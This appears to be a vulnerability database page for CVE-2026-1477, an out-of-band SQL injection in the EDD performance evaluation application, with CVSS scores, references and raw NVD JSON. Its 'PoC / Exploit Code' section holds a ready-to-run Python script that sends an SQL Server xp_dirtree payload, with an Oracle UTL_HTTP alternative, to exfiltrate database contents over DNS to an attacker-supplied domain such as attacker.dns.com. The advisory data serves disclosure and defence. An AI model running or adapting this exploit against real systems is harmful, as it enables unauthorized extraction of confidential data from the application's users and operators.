CVE-2026-1477

Description

An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' and 'Id_evaluacion’ in ‘/evaluacion_competencias_evalua_old.aspx’, could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:* - VULNERABLE

EDD Performance Evaluation Application (all versions prior to patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1477 OOB SQL Injection PoC
# Target: EDD Performance Evaluation Application
# Parameter: Id_usuario or Id_evaluacion
# Endpoint: /evaluacion_competencias_evalua_old.aspx

def exploit(target_url, attacker_dns):
    """
    Exploit OOB SQL injection to extract data via DNS exfiltration
    """
    # Target parameters vulnerable to SQLi
    vulnerable_param = 'Id_usuario'
    
    # OOB SQL injection payload for SQL Server
    # Extracts current database name via DNS
    payload = f"'; DECLARE @host VARCHAR(8000); SET @host = (SELECT TOP 1 name FROM master..sysdatabases)+'.{attacker_dns}'; EXEC('master..xp_dirtree ''\\'+@host+''\c$\');--"
    
    # Alternative payload for Oracle
    # payload = f"'; SELECT UTL_HTTP.REQUEST('http://'||(SELECT user FROM dual)||'.{attacker_dns}') FROM dual;--"
    
    try:
        data = {
            vulnerable_param: payload,
            'Id_evaluacion': '1'
        }
        
        print(f'[*] Sending payload to {target_url}')
        print(f'[*] Payload: {payload}')
        
        response = requests.post(target_url, data=data, timeout=10)
        
        print(f'[+] Request sent successfully')
        print(f'[*] Check DNS logs at {attacker_dns} for exfiltrated data')
        
        return True
        
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <attacker_dns>')
        print(f'Example: python {sys.argv[0]} http://target.com/evaluacion_competencias_evalua_old.aspx attacker.dns.com')
        sys.exit(1)
    
    target = sys.argv[1]
    dns_server = sys.argv[2]
    exploit(target, dns_server)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1477
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1477
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1477/
[4] VulDB https://vuldb.com/cve/CVE-2026-1477
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1477", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:11.137", "lastModified": "2026-02-10T20:16:26.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' and 'Id_evaluacion’ in ‘/evaluacion_competencias_evalua_old.aspx’, could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. La explotación de esta vulnerabilidad en los parámetros 'Id_usuario' e 'Id_evaluacion' en '/evaluacion_competencias_evalua_old.aspx' podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}